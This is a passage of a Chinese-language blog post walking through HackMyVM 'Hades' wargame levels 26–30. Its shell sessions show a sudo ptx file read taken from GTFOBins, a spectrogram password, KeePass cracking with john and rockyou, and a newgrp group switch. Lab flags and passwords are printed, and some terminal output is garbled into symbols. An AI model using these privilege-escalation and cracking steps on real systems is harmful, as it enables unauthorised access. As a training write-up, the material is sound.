LANG\n\u240d\u240a\u250c\u240b\u2592@\n\u2592\u240d\u240a\u23bd:\u00b7$ \u250c\u23ba\u240c\u2592\u250c\u240a -\u2592\nC\nC.\u2524\u251c\u00b08\nPOSIX\n\u240d\u240a\u250c\u240b\u2592@\n\u2592\u240d\u240a\u23bd:\u00b7$ \u240a\u2502\u23bb\u23ba\u23bc\u251c LANG=C.UTF-8<\/code><\/pre>\n
\u4f46\u662f\u6ca1\u6709\u6210\u529f\uff0c\u76f4\u63a5\u5c06\u6587\u4ef6\u62f7\u51fa\u6765\u8bd5\u8bd5:<\/p>\n
hgbe02@pwn:~\/temp$ scp -P 6666 hades.hackmyvm.eu:\/pwned\/delia\/flagz.txt .\nhgbe02@hades.hackmyvm.eu's password: <\/code><\/pre>\n
\u4e0d\u884c\uff0c\u5c06\u6587\u4ef6\u4f20\u5230\u516c\u5171\u76ee\u5f55\u6362\u4e2a\u7528\u6237\u53bb\u8bfb\u8bd5\u8bd5\uff1a<\/p>\n
\u240d\u240a\u250c\u240b\u2592@\n\u2592\u240d\u240a\u23bd:\u00b7$ \u240c\u23bb \u00b0\u250c\u2592\u00b1\u2265.\u251c\u2502\u251c  \/\u2534\u2592\u23bc\/\u251c\u2514\u23bb\/\u251c\u240a\u2514\u23bb \u00b0\u250c\u2592\u00b1.\u251c\u2502\u251c\n\u240d\u240a\u250c\u240b\u2592@\n\u2592\u240d\u240a\u23bd:\u00b7$ \u240c\u23bb \u2514\u240b\u23bd\u23bd\u240b\u23ba\u253c.\u251c\u2502\u251c  \/\u2534\u2592\u23bc\/\u251c\u2514\u23bb\/\u251c\u240a\u2514\u23bb \u2514\u240b\u23bd\u23bd\u240b\u23ba\u253c.\u251c\u2502\u251c \n\u240d\u240a\u250c\u240b\u2592@\n\u2592\u240d\u240a\u23bd:\u00b7$ \u23bd\u2524\u240d\u23ba -\u250c\n[\u23bd\u2524\u240d\u23ba] \u23bb\u2592\u23bd\u23bd\u252c\u23ba\u23bc\u240d \u00b0\u23ba\u23bc \u240d\u240a\u250c\u240b\u2592: \nS\u23ba\u23bc\u23bc\u2264, \u2524\u23bd\u240a\u23bc \u240d\u240a\u250c\u240b\u2592 \u2514\u2592\u2264 \u253c\u23ba\u251c \u23bc\u2524\u253c \u23bd\u2524\u240d\u23ba \u23ba\u253c \n\u2592\u240d\u240a\u23bd.\n\u240d\u240a\u250c\u240b\u2592@\n\u2592\u240d\u240a\u23bd:\u00b7$ \u240c\n\u2514\u23ba\u240d 777 \/\u2534\u2592\u23bc\/\u251c\u2514\u23bb\/\u251c\u240a\u2514\u23bb \u00b0\u250c\u2592\u00b1.\u251c\u2502\u251c \n\u240d\u240a\u250c\u240b\u2592@\n\u2592\u240d\u240a\u23bd:\u00b7$ \u240c\n\u2514\u23ba\u240d 777 \/\u2534\u2592\u23bc\/\u251c\u2514\u23bb\/\u251c\u240a\u2514\u23bb \u2514\u240b\u23bd\u23bd\u240b\u23ba\u253c.\u251c\u2502\u251c <\/code><\/pre>\n
\u6ca1\u6709sudo\u4efb\u52a1\uff0c\u6362\u4e2a\u7528\u6237\u8fdb\u884c\u8bfb\u53d6\uff0c\u5bf9\u4e86\u8bb0\u5f97\u8981\u4fee\u6539\u6743\u9650\uff0c\u4e0d\u7136\u8bfb\u4e0d\u4e86\uff0c\u60b2<\/p>\n
daphne@hades:~$ cat \/var\/tmp\/temp_flag.txt \n^QfaHPyEqMepsOdMxQCQ^\ndaphne@hades:~$ cat \/var\/tmp\/temp_mission.txt\n################\n# MISSION 0x26 #\n################\n\n## EN ##\nUser demeter reads in another language.\n\n## ES ##\nLa usuaria demeter lee en otro idioma.<\/code><\/pre>\n
\u56de\u5934\u770b\u53d1\u73b0\u8fd8\u6709\u4e00\u4e2a\u4e8c\u8fdb\u5236\u6587\u4ef6\uff0c\u5c1d\u8bd5\u8fd0\u884c\u4e00\u4e0b\uff1a<\/p>\n
\u240d\u240a\u250c\u240b\u2592@\n\u2592\u240d\u240a\u23bd:\u00b7$ .\/\u23bd\n\u23ba\u252c\u23bb\u2592\u23bd\u23bd \n\nF\u2510\u2264\u2524X\u2510\u2510JNONDC\n\u23ba\u2592K\u2265OI<\/code><\/pre>\n
\u5c06flag\u4e5f\u62f7\u8fc7\u53bb\uff1a<\/p>\n
\u240d\u240a\u250c\u240b\u2592@\n\u2592\u240d\u240a\u23bd:\u00b7$ .\/\u23bd\n\u23ba\u252c\u23bb\u2592\u23bd\u23bd > \/\u2534\u2592\u23bc\/\u251c\u2514\u23bb\/\u251c\u240a\u2514\u23bb \u23bb\u2592\u23bd\u23bd.\u251c\u2502\u251c\n\u240d\u240a\u250c\u240b\u2592@\n\u2592\u240d\u240a\u23bd:\u00b7$ \u240c\n\u2514\u23ba\u240d 777 \/\u2534\u2592\u23bc\/\u251c\u2514\u23bb\/\u251c\u240a\u2514\u23bb \u23bb\u2592\u23bd\u23bd.\u251c\u2502\u251c <\/code><\/pre>\n
\u8bfb\u4e00\u4e0b\uff1a<\/p>\n
daphne@hades:~$ cat \/var\/tmp\/temp_pass.txt \n\nFkyuXkkJNONDChoaKzOI<\/code><\/pre>\n
27 demeter<\/h2>\n
demeter@hades:~$ ls -la\ntotal 32\ndrwxr-x--- 2 root    demeter 4096 Apr  5 06:36 .\ndrwxr-xr-x 1 root    root    4096 Apr  5 06:36 ..\n-rw-r--r-- 1 demeter demeter  220 Apr 23  2023 .bash_logout\n-rw-r--r-- 1 demeter demeter 3526 Apr 23  2023 .bashrc\n-rw-r--r-- 1 demeter demeter  807 Apr 23  2023 .profile\n-rw-r----- 1 root    demeter   22 Apr  5 06:36 flagz.txt\n-rw-r----- 1 root    demeter  119 Apr  5 06:36 mission.txt\ndemeter@hades:~$ grep -ra '\\^*\\^' .\n.\/flagz.txt:^JiviWHRVRZLSfjBuwAi^\ndemeter@hades:~$ cat mission.txt \n################\n# MISSION 0x27 #\n################\n\n## EN ##\nThe user echo permute.\n\n## ES ##\nLa usuaria echo permuta.<\/code><\/pre>\n
\u53ef\u4ee5\u53c2\u8003 https:\/\/gtfobins.github.io\/gtfobins\/ptx\/#file-read<\/a>  \u8fdb\u884c\u63d0\u6743
\nIt reads data from files, it may be used to do privileged reads or disclose files outside a restricted file system.<\/p>\n
LFILE=file_to_read
\nptx -w 5000 "$LFILE"<\/p>\n
demeter@hades:~$ sudo -l\nMatching Defaults entries for demeter on hades:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin, use_pty\n\nUser demeter may run the following commands on hades:\n    (echo) NOPASSWD: \/usr\/bin\/ptx\ndemeter@hades:~$ sudo -u echo \/usr\/bin\/ptx -w 5000 \/pwned\/echo\/flagz.txt\n^   abeDeOxlPMAABepeBHy^\n<\/code><\/pre>\n
\u62ff\u4e0b\uff01<\/p>\n
28 echo<\/h2>\n
27: echo\/GztROerShmiyiCIlfepG<\/p>\n
echo@hades:~$ ls -la\ntotal 468\ndrwxr-x--- 2 root echo   4096 Apr  5 06:36 .\ndrwxr-xr-x 1 root root   4096 Apr  5 06:36 ..\n-rw-r--r-- 1 echo echo    220 Apr 23  2023 .bash_logout\n-rw-r--r-- 1 echo echo   3526 Apr 23  2023 .bashrc\n-rw-r--r-- 1 echo echo    807 Apr 23  2023 .profile\n-rw-r----- 1 root echo     22 Apr  5 06:36 flagz.txt\n-rw-r----- 1 root echo    142 Apr  5 06:36 mission.txt\n-rw-r----- 1 root echo 442848 Dec 20  2021 noise.wav\necho@hades:~$ cat flagz.txt \n^abeDeOxlPMAABepeBHy^\necho@hades:~$ cat mission.txt \n################\n# MISSION 0x28 #\n################\n\n## EN ##\nThe user eos can see the sounds.\n\n## ES ##\nLa usuaria eos puede ver los sonidos.<\/code><\/pre>\n
\u5f88\u660e\u663e\u662f\u9690\u5199\uff0c\u53ef\u4ee5\u770b\u89c1\u97f3\u9891\uff0c\u62ffAudacity<\/code>\u770b\u4e00\u4e0b:<\/p>\n
hgbe02@pwn:\/mnt\/c\/Users\/Administrator\/Desktop$ scp -P 6666 echo@hades.hackmyvm.eu:\/pwned\/echo\/noise.wav .\n\n                                                      .     **\n                                                   *           *.\n                                                                  ,*\n                                                                     *,\n                                             ,                         ,*\n                                          .,                              *,\n                                       \/                                    *\n                                    ,*                                        *,\n                                 \/.                                            .*.\n                                                                _____\n                __     __           _____         ____________      _____\\    \\            _____\n                \/  \\   \/  \\        \/      |_       \\           \\    \/    \/ |    |      _____\\    \\\n                \/   \/| |\\   \\      \/         \\       \\           \\  \/    \/  \/___\/|     \/    \/ \\    |\n                \/   \/\/   \\   \\    |     \/\\    \\       |    \/\\     ||    |__ |___|\/    |    |  \/___\/|\n                \/    \\_____\/    \\   |    |  |    \\      |   |  |    ||       \\       ____\\    \\ |   ||\n                \/    \/\\_____\/\\    \\  |     \\\/      \\     |    \\\/     ||     __\/ __   \/    \/\\    \\|___|\/\n                \/    \/\/\\_____\/\\    \\ |\\      \/\\     \\   \/           \/||\\    \\  \/  \\ |    |\/ \\    \\\n                \/____\/ |       | \\____\\| \\_____\\ \\_____\\ \/___________\/ || \\____\\\/    ||\\____\\ \/____\/|\n                |    | |       | |    || |     | |     ||           | \/ | |    |____\/|| |   ||    | |\n                |____|\/         \\|____| \\|_____|\\|_____||___________|\/   \\|____|   | | \\|___||____|\/\n                                                                        |___|\/\n\n                                       **                                    **.\n                                          ,*                                **\n                                             *,                          ,*\n                                                *                      **\n                                                *,                .*\n                                                   *.           **\n                                                      **      ,*,\n                                                         ** *,\n                                        [== HMVLabs Chapter 2: Hades ==]\n\n                                         +===========================+\n                                         |        Respect &          |\n                                         |        Have fun!          |\n                                         |                           |\n                                         | https:\/\/hackmyvm.eu\/hades |\n                                         +===========================+\n\necho@hades.hackmyvm.eu's password: \nnoise.wav                                                                                                                                           100%  432KB 285.0KB\/s   00:01    \n<\/code><\/pre>\n
\u770b\u4e86\u4e00\u4e0b\u9891\u8c31\u56fe\u53d1\u73b0\u4e86\u5bc6\u7801: CWBKRQX<\/p>\n
29 eos<\/h2>\n
eos@hades:~$ ls -la\ntotal 36\ndrwxr-x--- 2 root eos  4096 Apr  5 06:36 .\ndrwxr-xr-x 1 root root 4096 Apr  5 06:36 ..\n-rw-r--r-- 1 eos  eos   220 Apr 23  2023 .bash_logout\n-rw-r--r-- 1 eos  eos  3526 Apr 23  2023 .bashrc\n-rw-r--r-- 1 eos  eos   807 Apr 23  2023 .profile\n-rw-r----- 1 root eos    22 Apr  5 06:36 flagz.txt\n-rw-r----- 1 root eos   181 Apr  5 06:36 mission.txt\n-r-xr-x--- 1 root eos  1902 Apr  5 06:36 secretz.kbdx\neos@hades:~$ cat flagz.txt \n^OsoLytPlXEjvinhCNyy^\neos@hades:~$ cat mission.txt \n################\n# MISSION 0x29 #\n################\n\n## EN ##\nThe user gaia is very careful saving her passwords.\n\n## ES ##\nLa usuaria gaia es muy precavida guardando sus passwords.<\/code><\/pre>\n
\u5c1d\u8bd5\u8fdb\u884c\u7206\u7834\uff0c\u7136\u540e\u8fdb\u884c\u63d0\u53d6\u5bc6\u7801\uff0c\u53ef\u4ee5\u5c1d\u8bd5john\u7ed3\u5408\u5728\u7ebf\u7f51\u7ad9<\/code>\u7684\u65b9\u6cd5\uff0c\u6216\u8005\u76f4\u63a5\u4f7f\u7528 Passware\u8fdb\u884c\u7206\u7834\u4f7f\u7528\uff1a<\/p>\n
eos@hades:~$ cp secretz.kbdx \/var\/tmp\/secretz.kbdx \neos@hades:~$ chmod 777 \/var\/tmp\/secretz.kbdx\nhgbe02@pwn:\/mnt\/c\/Users\/Administrator\/Desktop$ scp -P 6666 eos@hades.hackmyvm.eu:\/var\/tmp\/secretz.kbdx .\n\n                                                      .     **\n                                                   *           *.\n                                                                  ,*\n                                                                     *,\n                                             ,                         ,*\n                                          .,                              *,\n                                       \/                                    *\n                                    ,*                                        *,\n                                 \/.                                            .*.\n                                                                _____\n                __     __           _____         ____________      _____\\    \\            _____\n                \/  \\   \/  \\        \/      |_       \\           \\    \/    \/ |    |      _____\\    \\\n                \/   \/| |\\   \\      \/         \\       \\           \\  \/    \/  \/___\/|     \/    \/ \\    |\n                \/   \/\/   \\   \\    |     \/\\    \\       |    \/\\     ||    |__ |___|\/    |    |  \/___\/|\n                \/    \\_____\/    \\   |    |  |    \\      |   |  |    ||       \\       ____\\    \\ |   ||\n                \/    \/\\_____\/\\    \\  |     \\\/      \\     |    \\\/     ||     __\/ __   \/    \/\\    \\|___|\/\n                \/    \/\/\\_____\/\\    \\ |\\      \/\\     \\   \/           \/||\\    \\  \/  \\ |    |\/ \\    \\\n                \/____\/ |       | \\____\\| \\_____\\ \\_____\\ \/___________\/ || \\____\\\/    ||\\____\\ \/____\/|\n                |    | |       | |    || |     | |     ||           | \/ | |    |____\/|| |   ||    | |\n                |____|\/         \\|____| \\|_____|\\|_____||___________|\/   \\|____|   | | \\|___||____|\/\n                                                                        |___|\/\n\n                                       **                                    **.\n                                          ,*                                **\n                                             *,                          ,*\n                                                *                      **\n                                                *,                .*\n                                                   *.           **\n                                                      **      ,*,\n                                                         ** *,\n                                        [== HMVLabs Chapter 2: Hades ==]\n\n                                         +===========================+\n                                         |        Respect &          |\n                                         |        Have fun!          |\n                                         |                           |\n                                         | https:\/\/hackmyvm.eu\/hades |\n                                         +===========================+\n\neos@hades.hackmyvm.eu's password: \nsecretz.kbdx                                                                                                                                        100% 1902     7.3KB\/s   00:00    \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/Desktop]\n\u2514\u2500$ keepass2john secretz.kbdx > hash                                     \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/Desktop]\n\u2514\u2500$ john hash -w=\/usr\/share\/wordlists\/rockyou.txt            \nUsing default input encoding: UTF-8\nLoaded 1 password hash (KeePass [SHA256 AES 32\/64])\nCost 1 (iteration count) is 60000 for all loaded hashes\nCost 2 (version) is 2 for all loaded hashes\nCost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes\nWill run 4 OpenMP threads\nPress 'q' or Ctrl-C to abort, almost any other key for status\nheaven           (secretz.kbdx)     \n1g 0:00:00:01 DONE (2024-07-03 09:57) 0.9174g\/s 176.1p\/s 176.1c\/s 176.1C\/s pepper..november\nUse the "--show" option to display all of the cracked passwords reliably\nSession completed.<\/code><\/pre>\n
\u5230\u7f51\u7ad9\u4e0a\u4f20\u6587\u4ef6\u53ca\u5bc6\u7801\u4ee5\u540e\u5f97\u5230\u7528\u6237\u5bc6\u7801\uff01sbUcegcdYTTWzTKojzgm
\n\u7f51\u7ad9\u4f7f\u7528\u7684\u662f\uff1ahttps:\/\/app.keeweb.info\/<\/a> \u5f88\u597d\u7528\uff01<\/p>\n
30 gaia<\/h2>\n
es:~$ ls -la\ntotal 40\ndrwxr-x--- 2 root gaia  4096 Apr  5 06:36 .\ndrwxr-xr-x 1 root root  4096 Apr  5 06:36 ..\n-rw-r--r-- 1 gaia gaia   220 Apr 23  2023 .bash_logout\n-rw-r--r-- 1 gaia gaia  3526 Apr 23  2023 .bashrc\n-rw-r--r-- 1 gaia gaia   807 Apr 23  2023 .profile\n-rw-r----- 1 root gaia    22 Apr  5 06:36 flagz.txt\n-rw-r----- 1 root gaia    10 Apr  5 06:36 hpass1.txt\n-rw-r----- 1 root powah   23 Apr  5 06:36 hpass2.txt\n-rw-r----- 1 root gaia   146 Apr  5 06:36 mission.txt\ngaia@hades:~$ grep -ra '\\^*\\^' .\ngrep: .\/hpass2.txt: Permission denied\n.\/flagz.txt:^NWelryzwJowjEaDWEiY^\ngaia@hades:~$ cat mission.txt \n################\n# MISSION 0x30 #\n################\n\n## EN ##\nUser halcyon wants all the powah.\n\n## ES ##\nLa usuaria halcyon quiere todo el powah.\ngaia@hades:~$ cat hpass1.txt\n\nmanuela\n\ngaia@hades:~$ id powah\nid: 'powah': no such user\ngaia@hades:~$ find \/ -group powah -type f 2>\/dev\/null\n\/etc\/w3m\/ga\n\/pwned\/gaia\/hpass2.txt\ngaia@hades:~$ sudo -l    \n[sudo] password for gaia: \nSorry, user gaia may not run sudo on hades.\ngaia@hades:~$ ls -la \/etc\/w3m\/ga\n-rw-r----- 1 root powah 23 Jan 15  2019 \/etc\/w3m\/ga\ngaia@hades:~$ cat \/etc\/group | grep "powah"\npowah:x:1000:\ngaia@hades:~$ group\n-bash: group: command not found\ngaia@hades:~$ whoami;id\ngaia\nuid=2021(gaia) gid=2021(gaia) groups=2021(gaia)\ngaia@hades:~$ cat hpass1.txt \n\nmanuela\n\ngaia@hades:~$ newgrp\ngaia@hades:~$ whoami;id\ngaia\nuid=2021(gaia) gid=2021(gaia) groups=2021(gaia)\ngaia@hades:~$ newgrp powah\nPassword:\ngaia@hades:~$ whoami;id\ngaia\nuid=2021(gaia) gid=1000(powah) groups=1000(powah),2021(gaia)\ngaia@hades:~$ cat hpass2.txt \n\ncuMRRameGdmhVxHcYYYs\n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
21 cassiopeia cassiopeia@hades:~$ ls -la total 32 drwxr […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-724","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/724","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=724"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/724\/revisions"}],"predecessor-version":[{"id":725,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/724\/revisions\/725"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=724"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=724"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=724"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}